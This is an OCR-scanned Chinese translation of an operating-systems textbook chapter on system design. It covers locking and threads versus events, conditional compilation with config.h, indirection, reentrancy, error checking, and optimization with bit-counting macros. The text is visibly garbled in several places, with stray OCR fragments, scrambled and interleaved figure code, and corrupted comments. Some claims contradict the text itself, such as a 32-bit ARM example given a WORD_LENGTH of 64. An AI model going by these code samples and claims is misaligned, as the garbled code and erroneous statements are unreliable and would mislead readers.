如 果 线 程 频繁 读 写 共享 的 数据 结构 ,那么 事情 变 得 更 加 复杂 。 在 这 种 情况 下 , 不 可 避免 地 要 使 用 锁 。 
不 幸 的 是 ， 正 确 使 用 锁 并 不 容易 。 最 简单 解决 方法 是 在 所 有 的 共享 数据 结构 上 使 用 一 个 大 锁 (类 似 大 内 
核 锁 ) 。 当 线程 想 要 访问 共享 数据 结构 时 ， 需 要 首先 获取 锁 。 出 于 性 能 的 考虑 ， 一 个 单一 的 大 锁 是 不 是 
好 主意 ， 因 为 即使 线程 间 并 不 冲突 ， 它 们 也 需要 互相 等 待 。 另 一 个 极端 是 ， 为 单独 的 数据 结构 使 用 大 量 
的 锁 ， 这 样 会 更 快 ， 但 是 与 我 们 的 指导 原则 一 一 简单 性 相 冲 突 。 

其 他 的 操作 系统 使 用 异步 通信 来 实现 进程 间 通 信 。 在 某 种 程度 上 ， 异 步 通信 比 同步 通信 更 简单 。 客 
户 端 进程 向 服务 器 发 一 个 消息 ， 但 是 并 不 等 待 消息 被 传递 或 者 回复 ， 而 是 继续 执行 。 当 然 ， 这 意味 着 它 
也 异步 接收 回复 ， 同 时 当 回复 到 达 时 需要 知道 这 个 回复 对 应 哪个 请 求 。 服 务 器 通常 在 一 个 事件 循环 中 使 
用 单线 程 处 理 请 求 。 

当 一 个 请 求 需要 服务 器 与 其 他 服务 器 通信 以 进行 进一步 处 理 时 ， 服 务 器 发 送 一 个 自己 的 异步 请 求 ， 
然后 并 不 阻塞 ， 而 是 继续 处 理 下 一 个 请 求 。 并 不 需要 多 线程 。 只 要 使 用 一 个 线程 ， 多 线程 访问 共享 数据 
结构 的 问题 就 不 会 发 生 。 另 一 方面 ， 一 个 长 期 运行 的 事件 处 理 程 序 会 使 单线 程 服务 器 运行 缓慢 。 

自从 John Ousterhout 的 经 典 论文 “为 什么 线程 是 一 个 粳 糕 的 想法 (在 大 多 数 情况 下 )”(1996) 发 表 
以 来 ， 线 程 和 事件 哪个 是 更 好 的 编程 模型 就 是 一 个 长 期 以 来 使 狂热 者 激动 的 话题 。Ousterhout 指 出 ， 线 
程 使 一 切 变 得 复杂 一 一 锁 、 调 试 、 回 调 、 性 能 等 ， 而 这 些 都 是 不 必要 的 。 当 然 ， 如 果 人 人 都 同意 的 话 ， 
就 不 会 变 成 论战 了 。 在 Ousterhout 的 论文 发 表 几 年 之 后 ，Von Behren 等 人 (2003) 发 表 了 一 篇 论文 ， 题 
为 “为 什么 事件 是 一 个 糟糕 的 想法 (对 于 高 并 发 性 服务 器 )”。 因 此 ， 对 于 系统 设计 者 ， 在 正确 编程 模型 
的 决定 上 是 一 个 艰难 但 是 很 重要 的 问题 。 这 场 论战 没有 冠军 。 像 apache 这 样 的 Web 服 务 器 坚决 拥护 异步 
通信 ， 但 是 lighttpd 等 其 他 服务 器 则 基于 事件 驱动 模式 。 两 者 都 非常 受 欢迎 。 在 我 们 看 来 ， 事 件 相 比 于 线 
程 更 加 容易 理解 和 调试 。 只 要 没有 多 核 并 发 的 需要 ， 事 件 很 可 能 是 一 个 好 的 选择 。 


12.3.9 实用 技术 

我 们 刚刚 了 解 了 系统 设计 与 实现 的 某 些 抽象 思想 ， 现 在 将 针对 系统 实现 考察 一 些 有 用 的 具体 技术 。 
这 方面 的 技术 很 多 ， 但 是 篇 幅 的 限制 使 我 们 只 能 介绍 其 中 的 少数 技术 。 

1. 隐藏 硬件 

许多 硬件 是 十 分 麻烦 的 , 所 以 只 好 尽早 将 其 隐藏 起 来 (除非 它 要 展现 能 力 , 而 大 多 数 硬 件 不 会 这 样 )。 
某 些 非 常 低层 的 细节 可 以 通过 如 图 12-2 所 示 层 次 1 的 HAL 类 型 的 层次 得 到 隐藏 。 然 而 ， 许 多 硬件 细节 不 
能 以 这 样 的 方式 来 隐藏 。 

值得 尽早 关注 的 一 件 事情 是 如 何 处 理 中 断 。 中 断 使 得 程序 设计 令 人 不 愉快 ， 但 是 操作 系统 必须 对 它 
们 进行 处 理 。 一 种 方法 是 立刻 将 中 断 转 变 成 别 的 东西 ， 例 如 ， 每 个 中 断 都 可 以 转变 成 即时 弹出 的 线程 。 
在 这 一 时 刻 ， 我 们 处 理 的 是 线程 ， 而 不 是 中 断 。 

第 二 种 方法 是 将 每 个 中 断 转换 成 在 一 个 互 斥 量 上 的 unlock 操 作 , 该 互 斥 量 对 应 正在 等 待 的 驱动 程序 。 
于 是 ， 中 断 的 唯一 效果 就 是 导致 某 个 线程 变 为 就 绪 。 

第 三 种 方法 是 将 一 个 中 断 立 即 转换 成 发 送 给 某 个 线程 的 消息 。 低 层 代码 只 是 构造 一 个 表明 中 断 来 自 
何 处 的 消息 ， 将 其 排 和 队列， 并 且 调 用 调度 器 以 (潜在 地 ) 运行 处 理 程 序 ， 而 处 理 程序 可 能 正在 阻塞 等 
待 该 消息 。 所 有 这 些 技术 ,以 及 其 他 类 似 的 技术 ， 都 试图 将 中 断 转 换 成 线程 同步 操作 。 让 每 个 中 断 由 一 
个 适当 的 线程 在 适当 的 上 下 文中 处 理 ， 比 起 在 中 断 磁 巧 发 生 的 随意 上 下 文中 运行 处 理 程序 ， 前 者 要 更 加 
容易 管理 。 当 然 ， 这 必须 高 效率 地 进行 ， 而 在 操作 系统 内 部 深 处 ， 一 切 都 必须 高 效率 地 进行 。 

大 多 数 操作 系统 被 设计 成 运行 在 多 个 硬件 平台 上 。 这 些 平 台 可 以 按照 CPU 芯片 、MMU、 字 长 、 
RAM 大 小 以 及 不 能 容易 地 由 HAL 或 等 价 模块 屏蔽 的 其 他 特性 来 区 分 。 尽 管 如 此 ， 人 们 高 度 期 望 拥 有 单 
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一 的 一 组 源 文 件 用 来 生成 所 有 的 版 本 ， 否 则 ， 后 来 发 现 的 每 个 程序 错误 必须 在 多 个 源 文件 中 修改 多 次 ， 
SATA UR SCP A EAE HY FE o 

某 些 硬 件 的 差异 ， 例 如 RAM 大 小 ， 可 以 通过 让 操作 系统 在 引导 的 时 候 确定 其 取 值 并 且 保 存在 一 个 
变量 中 来 处 理 。 内 存 分 配器 可 以 利用 RAM 大 小 变量 来 确定 构造 多 大 的 数据 块 高 速 缓存 、 页 表 等 。 其 至 
静态 的 表格 ， 如 进程 表 ， 也 可 以 基于 总 的 可 用 内 存 来 确定 大 小 。 

然而 ， 其 他 的 差异 ， 例 如 不 同 的 CPU 芯片 ， 就 不 能 让 单一 的 二 进 制 代码 在 运行 的 时 候 确 定 它 正 在 哪 
一 个 CPU 上 运行 。 解 决 一 个 源 代 码 多 个 目标 机 的 问题 的 一 种 方法 是 使 用 条 件 编 译 。 在 源 文件 中 ， 定 义 了 
一 定 的 编译 时 标志 用 于 不 同 的 配置 ， 并 且 这 些 标志 用 来 将 独立 于 CPU、 字 长 、MMU 等 的 代码 用 括号 括 
起 。 例 如 ， 设 想 一 个 操作 系统 运行 在 x86 芯 片 的 [A32 行 (有 了 时 指 x86-32) 或 UltraSPARC 芯 片上 ， 这 就 需 
要 不 同 的 初始 化 代码 。 可 以 像 图 12-6a 中 那样 编写 init 过 程 的 代码 。 根 据 CPU 的 取 值 (该 值 定义 在 头 文件 
config.h), 实现 一 种 初始 化 或 其 他 的 初始 化 过 程 。 由 于 实际 的 二 进 制 代码 只 包含 目标 机 所 需要 的 代码 ， 
这 样 就 不 会 损失 效率 。 


#include "config.h" 


#if (WORD_LENGTH == 32) 
typedef int Register; 
#endif 


#include "config.h" 
init() 
#if (CPU == PENTIUM) 


/# 此 处 是 Pentium 的 初始 化 */ 
#endif 


#if (WORD_LENGTH == 64) 
typedef long Register; 
#if (CPU == ULTRASPARC) #endif 


个 此 处 是 UltraSPARC 的 初始 化 */ 
} 


Register RO, R1, R2, R3; 





a) b) 


图 12-6 a) 依赖 CPU 的 条 件 编译 ，b) 依赖 字 长 的 条 件 编译 


第 二 个 例子 ， 假 设 需要 一 个 数据 类 型 Register， 它 在 IA32 上 是 32 位 ， 在 UltraSPARC 上 是 64 位 。 这 可 
以 由 图 12-6b 中 的 条 件 代码 来 处 理 (假设 编译 器 产生 32 位 的 int 和 64 位 的 long)。 一 旦 做 出 这 样 的 定义 (可 
能 是 在 别 的 什么 地 方 的 头 文件 中 ) ， 程 序 员 就 可 以 只 需 声 明 变 量 为 Register 类 型 并 且 确 信 它 们 将 具有 正确 
的 长 度 。 
当然 ， 头 文件 config.h 必 须 正确 地 定义 。 对 于 Pentium 处 理 器 ， 它 大 概 是 这 样 的 : 
#define CPU IA32 
#define WORD_LENGTH 32 


为 了 编译 针对 UltraSPARC 的 系统 ， 应 该 使 用 不 同 的 config.h, 其 中 具有 针对 UltraSPARC 的 正确 取 值 ， 
它 或 许 是 这 样 的 : 

#define CPU ULTRASPARC 

#define WORD_LENGTH 64 


一 些 读者 可 能 会 感到 奇怪 ， 为 什么 CPU 和 WORD_LENGTH 用 不 同 的 宏 来 处 理 。 我 们 可 以 很 容易 地 
用 针对 CPU 的 测试 而 将 Register 的 定义 用 括号 括 起 ， 对 于 IA32 将 其 设置 为 32 位 ， 对 于 UltraSPARC 将 其 设 
置 为 64 位 。 然 而 ， 这 并 不 是 一 个 好 主意 。 考 虑 一 下 以 后 当 我 们 将 系统 移植 到 32 位 ARM 处 理 器 时 会 发 生 
什么 事情 。 我 们 可 能 不 得 不 为 了 ARM 而 在 图 12-6b 中 添加 第 三 个 条 件 。 通 过 像 上 面 那样 定义 宏 ， 我 们 要 
做 的 全 部 事情 是 在 config.h 文 件 中 为 ARM 处 理 器 包含 如 下 的 代码 行 : 

#define WORD_LENGTH 64 


这 个 例子 例证 了 前 面 讨论 过 的 正 交 性 原则 。 那 些 依赖 CPU 的 细节 应 该 基于 CPU 宏 而 条 件 编译 ， 而 那 
些 依赖 字 长 的 细节 则 应 该 使 用 WORD_LENGTH 宏 。 类 似 的 考虑 对 于 许多 其 他 参数 也 是 适用 的 。 
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2. 引用 

人 们 和 常 说 在 计算 机 科学 中 没有 什么 问题 不 能 通过 引用 而 得 到 解决 。 虽 然 有 些 夸大 其 词 ， 但 是 的 确 存 
在 一 定 程度 的 真实 性 。 让 我 们 考虑 一 些 例子 。 在 基于 x86 的 系统 上 ， 当 按 下 一 个 键 时 ， 硬 件 将 生成 一 个 中 
断 并 且 将 键 的 编号 而 不 是 ASCII 字 符 编码 送 到 一 个 设备 寄存 器 中 。 当 后 来 释放 此 键 时 ， 生 成 第 二 个 中 断 ， 
同样 伴随 一 个 键 编号 。 这 一 引用 为 操作 系统 使 用 键 编号 作为 索引 检索 一 张 表 格 以 获取 ASCII 字 符 提供 了 可 
能 ， 这 使 得 处 理 世 界 上 不 同 国家 使 用 的 各 种 键盘 变 得 十 分 容易 。 获 得 按 下 与 释放 两 个 信息 使 得 将 任何 键 
作为 换 档 键 成 为 可 能 ， 因 为 操作 系统 知道 键 按 下 与 释放 的 准确 序列 。 

引用 还 被 用 在 输出 上 。 程 序 可 以 将 ASCII 字 符 写 到 屏幕 上 ， 但 是 这 些 字符 被 解释 为 针对 当前 输出 字 
体 的 一 张 表格 的 索引 。 表 项 包含 字符 的 位 图 。 这 一 引用 使 得 将 字符 与 字体 相 分 离 成 为 可 能 。 

引用 的 另 一 个 例子 是 UNIX 中 主 设备 号 的 使 用 。 在 内 核 内 部 ， 有 一 张 表 格 以 块 设备 的 主 设备 号 作为 
索引 ， 还 有 另 一 张 表格 用 于 字符 设备 。 当 一 个 进程 打开 一 个 特定 的 文件 (例如 /dev/hd0) BY, RAMIT 
点 提取 出 类 型 ( 块 设备 或 字符 设备 ) 和 主 副 设备 号 ， 并 且 检 索 适当 的 驱动 程序 表 以 找到 驱动 程序 。 这 一 
引用 使 得 重新 配置 系统 十 分 容易 ， 因 为 程序 涉及 的 是 符号 化 的 设备 名 ， 而 不 是 实际 的 驱动 程序 名 。 

还 有 另 一 个 引用 的 例子 出 现在 消息 传递 的 系统 中 ， 该 系统 命名 一 个 邮箱 而 不 是 一 个 进程 作为 消息 的 
目的 地 。 通 过 引用 邮箱 (而 不 是 指定 一 个 进程 作为 目的 地 )， 能 够 获得 很 大 的 灵活 性 (例如 ， 让 一 位 秘 
书 处 理 她 的 老板 的 消息 )。 

在 某 种 意义 上 ， 使 用 诸如 

#define PROC_TABLE_SIZE 256 


的 宏 也 是 引用 的 一 种 形式 ， 因 为 程序 员 无 须知 道 表 格 实 际 有 多 大 就 可 以 编写 代码 。 一 个 好 的 习惯 是 为 所 
有 的 常量 提供 符号 化 名 字 (有 时 -1、0 和 1 除外 ) ， 并 且 将 它们 放 在 头 文件 中 ， 同 时 提供 注释 解释 它们 代 
表 什 么 。 

3. 可 重用 性 

在 略微 不 同 的 上 下 文中 重用 相同 的 代码 通常 是 可 行 的 。 这 样 做 是 一 个 很 好 的 想法 ， 因 为 它 减少 了 二 
进 制 代码 的 大 小 并 且 意 味 着 代码 只 需要 调试 一 次 。 例 如 ， 假 设 用 位 图 来 跟踪 磁盘 上 的 空闲 块 。 磁 盘 块 管 
理 可 以 通过 提供 管理 位 图 的 过 程 alloc 和 free 得 到 处 理 。 

在 最 低 限度 上 ， 这 些 过 程 应 该 对 任何 磁盘 起 作用 。 但 是 我 们 可 以 比 这 更 进一步 。 相 同 的 过 程 还 可 以 
用 于 管理 内 存 块 、 文 件 系 统 块 高 速 缓存 中 的 块 ， 以 及 i 节点 。 事 实 上 ， 它 们 可 以 用 来 分 配 与 回收 能 够 线 
性 编号 的 任意 资源 。 

4. 重 入 

重 入 指 的 是 代码 同时 被 执行 两 次 或 多 次 的 能 力 。 在 多 处 理 器 系统 上 ， 总 是 存在 着 这 样 的 危险 : 当 一 
个 CPU 执行 某 个 过 程 时 ， 另 一 个 CPU 在 第 一 个 完成 之 前 也 开始 执行 它 。 在 这 种 情况 下 ， 不 同 CPU 上 的 两 
个 (或 多 个 ) 线程 可 能 在 同时 执行 相同 的 代码 。 这 种 情况 必须 通过 使 用 互 斥 量 或 者 某 些 其 他 保护 临界 区 
的 方法 进行 处 理 。 

然而 ， 在 单 处 理 器 上 ， 问 题 也 是 存在 的 。 特 别 地 ， 大 多 数 操作 系统 是 在 允许 中 断 的 情况 下 运行 的 。 
否则 ， 将 丢失 许多 中 断 并 且 使 系统 不 可 靠 。 当 操作 系统 忙于 执行 某 个 过 程 P 时 ， 完 全 有 可 能 发 生 一 个 中 
断 并 且 中 断 处 理 程序 也 调用 P。 如 果 P 的 数据 结构 在 中 断 发 生 的 时 刻 处 于 不 一 致 的 状态 ， 中 断 处 理 程序 就 
会 注意 到 它们 处 于 不 一 致 的 状态 并 且 失 败 。 

一 个 显而易见 的 例子 是 当 P 是 调度 器 时 ， 这 种 情况 便 会 发 生 。 假 设 某 个 进程 用 完了 它 的 时 间 配 额 ， 
并 且 操 作 系 统 正 将 其 移动 到 其 队列 的 末尾。 在 列表 处 理 的 半路 ， 中 断 发 生 了 ， 使 得 某 个 进程 就 结 ， 并 且 
运行 调度 器 。 由 于 队列 处 于 不 一 致 的 状态 ， 系 统 有 可 能 会 崩溃 。 因 此 ， 即 使 在 单 处 理 器 上 ， 最 好 是 操作 
系统 的 大 部 分 为 可 重 入 的 ， 关 键 的 数据 结构 用 互 斥 量 来 保护 ， 并 且 在 中 断 不 被 允许 的 时 刻 禁 用 中 断 。 

5. BH 

使 用 蛮 力 法 解决 问题 多 年 以 来 获得 了 较 差 的 名 声 ， 但 是 依据 简单 性 它 经 常 是 行 之 有 效 的 方法 。 每 个 
操作 系统 都 有 许多 很 少 会 调用 的 过 程 或 是 具有 很 少数 据 的 操作 ， 不 值得 对 它们 进行 优化 。 例 如 ， 在 系统 
内 部 经 常 有 必要 搜索 各 种 表格 和 数组 。 蛮 力 算 法 只 是 让 表格 保持 表 项 建立 时 的 顺序 ， 并 且 当 必须 查找 某 


572 RIZE 





个 东西 时 线性 地 搜索 表格 。 如 果 表 项 的 数目 很 少 〈 例 如 少 于 1000 个 ) ， 对 表格 排序 或 建立 散 列表 的 好 处 
不 大 ,但 是 代码 却 复杂 得 多 并 且 很 有 可 能 在 其 中 存在 错误 。 如 对 挂 载 表 (用 来 在 UNIX 系 统 中 记录 已 挂 
载 的 文件 系统 ) 排序 或 者 建立 哈 希 表 就 真 的 不 是 一 个 好 主意 。 

当然 ， 对 处 于 关键 路 径 上 的 功能 ， 例 如 上 下 文 切换 ， 使 它们 加 快速 度 的 一 切 措 施 都 应 该 尽力 去 做 ， 
即使 可 能 要 用 汇编 语言 编写 它们 。 但 是 ， 系 统 的 大 部 分 并 不 处 于 关键 路 径 上 。 例 如 ， 许 多 系统 调用 很 少 
被 调用 。 如 果 每 隔 1 秒 有 一 个 fork 调 用 ， 并且 该 调用 花费 1 毫秒 完成 ， 那 么 即便 将 其 优化 到 花费 0 秒 也 不 过 
仅 有 0.1% 的 获 益 。 如 果 优 化 过 的 代码 更 加 庞大 且 有 更 多 错误 ， 那 就 不 必 多 此 一 举 了 。 

6. 首先 检查 错误 

系统 调用 可 能 由 于 各 种 各 样 的 原因 而 执行 失败 : 要 打开 的 文件 属于 他 人 ， 因 为 进程 表 满 而 创建 进程 
失败 ， 或 者 因为 目标 进程 不 存在 而 使 信号 不 能 被 发 送 。 操 作 系统 在 执行 调用 之 前 必须 无 微 不 至 地 检查 每 
一 个 可 能 的 错误 。 

许多 系统 调用 还 需要 获得 资源 ， 例 如 进程 表 的 空位 、i 节 点 表 的 空位 或 文件 描述 符 。 一 般 性 的 建议 
是 在 获得 资源 之 前 ， 首 先进 行 检查 以 了 解 系 统 调用 能 否 实际 执行 ， 这 样 可 以 省 去 许多 麻烦 。 这 意味 着 ， 
将 所 有 的 测试 放 在 执行 系统 调用 的 过 程 的 开始 。 每 个 测试 应 该 具有 如 下 的 形式 : 

if (error_condition) return(ERROR_CODE); 


如 果 调 用 通过 了 所 有 严格 的 测试 ， 那 么 就 可 以 肯定 它 将 会 取得 成 功 。 在 这 一 时 刻 它 才能 获得 资源 。 

如 果 将 获得 资源 的 测试 分 散 开 ， 那么 就 意味 着 如 果 在 这 一 过 程 中 某 个 测试 失败 ， 到 这 一 时 刻 已 经 获 
得 的 所 有 资源 都 必须 归还 。 如 果 在 这 里 发 生 了 一 个 错误 并 且 资 源 没 有 被 归还 ， 可 能 并 不 会 立刻 发 生 破坏 。 
例如 ， 一 个 进程 表 项 可 能 只 是 变 得 永久 地 不 可 用 。 然 而 ， 随 着 时 间 的 流逝 ， 这 一 差错 可 能 会 触发 多 次 。 最 
终 ， 大 多 数 或 全 部 进程 表 项 可 能 都 会 变 得 不 可 用 ， 导 致 系统 以 一 种 极度 不 可 预料 且 难 以 调试 的 方式 崩溃 。 

许多 系统 以 内 存 泄 漏 的 形式 遭受 了 这 一 问题 的 侵害 。 典 型 地 ， 程 序 调 用 malloc 分 配 了 空间 ， 但 是 以 
后 忘记 了 调用 free 释 放 它 。 逐 渐 地 ， 所 有 的 内 存 都 消失 了 ， 直 到 系统 重新 启动 。 

Engler 等 人 (2000) 推荐 了 一 种 有 趣 的 方法 在 编译 时 检查 某 些 这 样 的 错误 。 他 们 注意 到 程序 员 知 道 
许多 定式 而 编译 器 并 不 知道 ， 例 如 当 你 锁定 一 个 互 斥 量 的 时 候 ， 所 有 在 锁定 操作 处 开始 的 路 径 都 必须 包 
含 一 个 解除 锁定 的 操作 并 且 在 相同 的 互 斥 量 上 没有 更 多 的 锁定 。 他 们 设计 了 一 种 方法 让 程序 员 将 这 一 事 
实 告 诉 编译 器 ， 并 且 指 示 编 译 器 在 编译 时 检查 所 有 路 径 以 发 现 对 定式 的 违犯 。 程 序 员 还 可 以 设 定 已 分 配 
的 内 存 必须 在 所 有 路 径 上 释放 ， 以 及 设 定 许多 其 他 的 条 件 。 


12.4 性 能 


所 有 事情 都 是 平等 的 ， 一 个 快速 的 操作 系统 比 一 个 慢 速 的 操作 系统 好 。 然 而 ， 一 个 快速 而 不 可 靠 的 
操作 系统 还 不 如 一 个 慢 速 但 可 靠 的 操作 系统 。 由 于 复杂 的 优化 经 常会 导致 程序 错误 ， 有 节制 地 使 用 它们 
是 很 重要 的 。 尽 管 如 此 ， 在 性 能 是 至 关 重 要 的 地 方 进行 优化 还 是 值得 的 。 在 下 面 几 节 我 们 将 看 一 些 一 般 
的 技术 ,这些 技术 在 特定 的 地 方 可 以 用 来 改进 性 能 。 


12.4.1 操作 系统 为 什么 运行 缓慢 

在 讨论 优化 技术 之 前 ， 值 得 指出 的 是 许多 操作 系统 运行 缓慢 在 很 大 程度 上 是 操作 系统 自身 造成 的 。 
例如 ， 古 老 的 操作 系统 ， 如 MS-DOS 和 UNIX 版 本 7 在 几 秒 钟 内 就 可 以 启动 。 现 代 UNIX 系 统 和 Windows 8 
尽管 运行 在 快 1000 倍 的 硬件 上 ， 可 能 要 花费 几 分 钟 才能 启动 。 原 因 是 它们 要 做 更 多 的 事情 ， 有 用 的 或 无 
用 的 。 看 一 个 相关 的 案例 。 即 插 即 用 使 得 安装 一 个 新 的 硬件 设备 相当 容易 ， 但 是 付出 的 代价 是 在 每 次 启 
动 时 ， 操 作 系 统 都 必须 要 检查 所 有 的 硬件 以 了 解 是 否 存在 新 的 设备 。 这 一 总 线 扫描 是 要 花 时 间 的 。 

一 种 替代 的 〈 并 且 依 作者 看 来 是 更 好 的 ) 方法 是 完全 抛弃 即 插 即 用 ， 并 且 在 屏幕 上 包含 一 个 图 标 标 
明 “ 安 装 新 硬件 ”"。 当 安装 一 个 新 的 硬件 设备 时 ， 用 户 可 以 点 击 图 标 开始 总 线 扫描 ， 而 不 是 在 每 次 启动 
的 时 候 做 这 件 事情 。 当 然 ， 当 今 的 系统 设计 人 员 是 完全 知道 这 一 选择 的 。 但 是 他 们 拒绝 这 一 选择 ， 主 要 
是 因为 他 们 假设 用 户 太 过 愚笨 而 不 能 正确 地 做 这 件 事情 (尽管 他 们 使 用 了 更 加 友好 的 措辞 )。 这 只 是 一 
个 例子 ， 但 是 还 存在 更 多 的 事例 ， 期 望 让 系统 “用 户 友 好 ”( 或 者 “傻瓜 式 ”， 取 决 于 你 的 看 法 ) 却 使 系 
统 始 终 对 所 有 用 户 是 缓慢 的 。 
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或 许 系统 设计 人 员 为 改进 性 能 可 以 做 的 最 大 的 一 件 事情 , 是 对 于 添加 新 的 功能 特性 更 加 具有 选择 性 。 
要 问 的 问题 不 是 “用 户 会 喜欢 吗 ? ”而 是 “这 一 功能 特性 按照 代码 大 小 、 速 度 、 复 杂 性 和 可 靠 性 值得 不 
计 代 价 吗 ? ”只 有 当 优 点 明显 地 超过 缺点 的 时 候 ， 它 才 应 该 被 包括 。 程 序 员 倾 向 于 假设 代码 大 小 和 程序 
错误 计数 为 0 并 且 速 度 为 无 穷 大 。 经 验 表明 这 种 观点 有 些 过 于 乐观 。 

另 一 个 重要 因素 是 产品 的 市 场 销售 。 到 某 件 产 品 的 第 4 或 第 5 版 上 市 的 时 候 ， 真 正 有 用 的 所 有 功能 特 
性 或 许 已 经 全 部 包括 了 ， 并 且 需 要 该 产品 的 大 多 数 人 已 经 拥有 它 了 。 为 了 保持 销售 ， 许 多 生产 商 仍然 继 
续 生 产 新 的 版 本 ， 具 有 更 多 的 功能 特性 ， 正 是 这 样 才 可 以 向 现 有 的 顾客 出 售 升级 版 。 只 是 为 了 添加 新 的 
功能 特性 而 添加 新 的 功能 特性 可 能 有 助 于 销售 ， 但 是 很 少 会 有 助 于 性 能 。 


12.4.2 什么 应 该 优化 

作为 一 般 的 规则 ， 系 统 的 第 一 版 应 该 尽 可 能 简单 明了 。 唯 一 的 优化 应 该 是 那些 显而易见 要 成 为 不 可 
避免 的 问题 的 事情 。 为 文件 系统 提供 块 高 速 缓存 就 是 这 样 的 一 个 例子 。 一 旦 系统 引导 起 来 并 运行 ， 就 应 
该 仔细 地 测量 以 了 解 时 间 真 正 花 在 了 什么 地 方 。 基 于 这 些 数 字 ， 应 该 在 最 有 帮助 的 地 方 做 出 优化 。 

这 里 有 一 个 关于 优化 不 但 不 好 反而 更 坏 的 真实 故事 。 作 者 (Tanenbaum) 以 前 的 一 名 学 生 编写 了 
MINIX 的 mkfs 程 序 。 该 程序 在 一 个 新 格式 化 的 磁盘 上 布下 一 个 新 的 文件 系统 。 这 名 学 生花 了 大 约 6 个 月 
的 时 间 对 其 进行 优化 ， 包 括 放 入 磁盘 高 速 缓存 。 当 他 上 交 该 程序 时 ， 它 不 能 工作 ， 需 要 另外 几 个 月 进行 
调试 。 在 计算 机 的 生命 周期 中 ， 当 系统 安装 时 ， 该 程序 典型 地 在 硬盘 上 运行 一 次 。 它 还 对 每 块 做 格式 化 
的 软盘 运行 一 次 。 每 次 运行 大 约 耗 时 2 秒 。 即 使 未 优化 的 版 本 耗 时 1 分 钟 ， 花 费 如 此 多 的 时 间 优 化 一 个 很 
少 使 用 的 程序 也 是 相当 不 值 的 。 

对 于 性 能 优化 ， 一 条 相当 适用 的 口号 是 : 

足够 好 就 够 好 了 。 

通过 这 条 口号 我 们 要 表达 的 意思 是 : 性 能 一 旦 达到 一 个 合理 的 水 平 ， 榨 出 最 后 一 点 百分比 的 努力 和 
复杂 性 或 许 并 不 值得 。 如 果 调 度 算法 相当 公平 并 且 在 90% 的 时 间 保 持 CPU 忙 碌 ， 它 就 尽 到 了 自己 的 职责 。 
发 明 一 个 改进 了 5% 但 是 要 复杂 得 多 的 算法 或 许 是 一 个 坏 主 意 。 类 似 地 ， 如 果 缺 页 率 足 够 低 到 不 是 瓶颈 ， 
克服 重重 难关 以 获得 优化 的 性 能 通常 并 不 值得 。 避 免 灾 难 比 获得 优化 的 性 能 要 重要 得 多 ， 特 别 是 针对 一 
种 负载 的 优化 对 于 另 一 种 负载 可 能 并 非 优 化 的 情况 。 

另 一 个 考虑 是 何 时 进行 优化 。 一 些 编程 人 员 具 有 一 种 无 论 开发 什么 ， 在 其 可 运行 之 后 都 要 拼命 进行 
优化 的 倾向 。 问 题 是 在 优化 之 后 ， 系 统 可 能 变 得 不 太 清 晰 ， 使 得 维护 和 调试 更 加 困难 。 同 样 ， 也 许 之 后 
需要 效果 更 加 好 的 优化 ， 这 也 让 改写 变 得 更 困难 。 这 个 问题 被 称 作 为 时 过 早 的 优化 。 人 称 算法 分 析 之 父 
的 Donald Knuth 曾 经 说 过 :“ 为 时 过 早 的 优化 是 罪恶 之 源 。” 


12.4.3 空间 -时 间 的 权衡 

改进 性 能 的 一 种 一 般 性 的 方法 是 权衡 时 间 与 空间 。 在 一 个 使 用 很 少 内 存 但 是 速度 比较 慢 的 算法 与 一 
个 使 用 很 多 内 存 但 是 速度 更 快 的 算法 之 间 进 行 选择 ， 这 在 计算 机 科学 中 是 经 常 发 生 的 事情 。 在 做 出 重要 
的 优化 时 ， 值 得 寻找 通过 使 用 更 多 内 存 加 快 了 速度 的 算法 ,或 者 反 过 来 通过 做 更 多 的 计算 节省 了 宝贵 的 
内 存 的 算法 。 

一 种 常用 而 有 益 的 技术 是 用 宏 来 代替 小 的 过 程 。 使 用 宏 消 除了 通常 与 过 程 调用 相关 联 的 开销 。 如 果 
调用 出 现在 一 个 循环 的 内 部 ， 这 种 获 益 尤其 显著 。 例 如 ， 假 设 我 们 使 用 位 图 来 跟踪 资源 ， 并 且 经 常 需要 
了 解 在 位 图 的 某 一 部 分 中 有 多 少 个 单元 是 空闲 的 。 为 此 ， 我 们 需要 一 个 过 程 bit_count 来 计数 一 个 字 节 中 值 
为 1 的 位 的 个 数 。 图 12-7a 中 给 出 了 简单 明了 的 过 程 。 它 对 一 个 字 节 中 的 各 个 位 循环 ， 每 次 它们 计数 一 次 。 
这 个 过 程 十 分 简单 直接 。 

该 过 程 有 两 个 低 效 的 根源 。 首 先 ， 它 必须 被 调用 ， 必 须 为 它 分 配 栈 空 间 ， 并 且 必 须 返 回 。 每 个 过 程 
调用 都 有 这 个 开销 。 第 二 ， 它 包含 一 个 循环 ， 并 且 总 是 存在 与 循环 相关 联 的 某 些 开销 。 

一 种 完全 不 同 的 方法 是 使 用 图 12-7b 中 的 宏 。 这 个 宏 是 一 个 内 联 表达 式 ， 它 通过 对 参数 连续 地 移 位 ， 
屏蔽 除 低 位 以 外 的 其 他 位 ， 并 且 将 8 个 项 相 加 ， 这 样 来 计算 位 的 和 。 这 个 宏 绝 不 是 一 件 艺术 作品 ， 但 是 
它 只 在 代码 中 出 现 一 次 。 当 这 个 宏 被 调用 时 ， 例 如 通过 


sum = bit_count(table[i]); 
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#define BYTE_SIZE 8 /#* 一 个 字 节 包含 8 个 位 #/ 
int bit_count(int byte) 
{ 


(* 对 一 个 字 节 中 的 位 进行 计数 #/ 

int i, count = 0; 

for (i = 0; i < BYTE_SIZE; i++) * 对 一 个 字 节 中 的 各 个 位 循环 */ 
if ((byte >> i) & 1) count++; /* 如 果 该 位 是 1， 计 数 加 1 */ 

return(count); /* 38 fl Fn */ 





a) 
此 将 一 个 字 节 中 的 位 相 加 并 且 返 回 和 的 宏 */ 
#define bit_count(b)((b&1) + ((b>>1)&1) + ((b>>2)&1) + ((b>>3)&1) + \ 
((b>>4)&1) + ((b>>5)&1) + ((b>>6)&1) + ((b>>7)&1)) 
b) 


I* 在 一 个 表 中 查找 位 计数 的 宏 */ 


char bits[256] = {0, 1, 1, 2, 1, 2, 2, 3, 1, 2, 2, 3, 2, 3, 3, 4, 1, 2, 2, 3, 2, 3, 3, ...}; 


#define bit_count(b) (int) bits[b] 





c) 
图 12-7 a) 对 一 个 字 节 中 的 位 进行 计数 的 过 程 ，b) 对 位 进行 计数 的 宏 ;,-c) 在 表 中 查找 位 计数 


这 个 宏 调用 看 起 来 与 过 程 调用 等 同 。 因 此 ， 除 了 定义 有 一 点 凌乱 以 外 ， 宏 中 的 代码 看 上 去 并 不 比 过 程 调 
